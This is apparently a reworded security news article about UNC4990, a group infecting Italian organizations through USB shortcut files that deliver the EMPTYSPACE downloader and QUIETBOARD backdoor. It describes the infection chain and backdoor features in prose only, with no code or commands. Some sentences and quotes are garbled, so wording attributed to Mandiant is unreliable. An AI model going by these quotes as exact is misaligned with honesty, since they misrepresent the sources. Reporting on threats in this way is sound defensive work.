☠️ Plug it in, get hacked!
A financially motivated threat actor known as UNC4990 is leveraging weaponized USB devices as the initial infection vector to target organizations in Italy.
Google-owned Mandiant said the attacks targeted many industries, including healthcare, transportation, construction and logistics.
“UNC4990 operations typically involve widespread USB infection followed by distribution of the EMPTYSPACE downloader,” the company said in a report published Tuesday.
“During these operations, the cluster relies on third-party websites such as GitHub, Vimeo, and Ars Technica to host additional coded stages that it downloads and decodes via PowerShell early in the execution chain.”
Active since late 2020, UNC4990 is considered to operate out of Italy, relying on extensive use of Italian infrastructure for command and control (C2) purposes.
It is currently unknown whether UNC4990 functions solely as an initial access facilitator for other actors. The threat actor's ultimate goal is also unclear, but in one instance an open-source cryptocurrency miner is said to have been deployed after months of beacon activity.
Details of the campaign were previously documented by Fortgale and Yoroi in early December 2023; the first was tracking the enemy under the name Nebula Broker.
The infection begins when the victim double-clicks on a malicious LNK shortcut file on a removable USB device, leading to the execution of a PowerShell script responsible for downloading EMPTYSPACE (aka BrokerLoader or Vetta Loader) from a remote server via another intermedia PowerShell script. It's hosted on Vimeo.
Yoroi said he identified four different variants of EMPTYSPACE written in Golang, .NET, Node.js, and Python, which then acted as a conduit to receive next-stage payloads over HTTP from the C2 server, including a backdoor called QUIETBOARD.
A notable aspect of this phase is the use of popular sites such as Ars Technica, GitHub, GitLab, and Vimeo to host the malicious payload.
"The content hosted on these services did not pose a direct risk to everyday users of these services, as the content hosted on its own was completely harmless," Mandiant researchers wrote. said. “Anyone who may have accidentally clicked on or viewed this content in the past was not at risk of being compromised.”
QUIETBOARD, on the other hand, is a Python-based backdoor with a wide range of features that allow it to execute arbitrary commands, modify crypto wallet addresses copied to the clipboard to route fund transfers to wallets under their control, spread malware on removable drives, and more. , take screenshots and collect system information.
Additionally, the backdoor has the ability to dynamically fetch and run Python code from the C2 server, as well as running standalone Python modules such as modular extensions and coin miners.
“The analysis of both EMPTYSPACE and QUIETBOARD demonstrates how threat actors are taking a modular approach when developing their toolkits,” Mandiant said.
The use of multiple programming languages to create different versions of the EMPTYSPACE downloader and the URL changing when the Vimeo video is removed demonstrates a trend towards experimentation and adaptability on the part of threat actors.”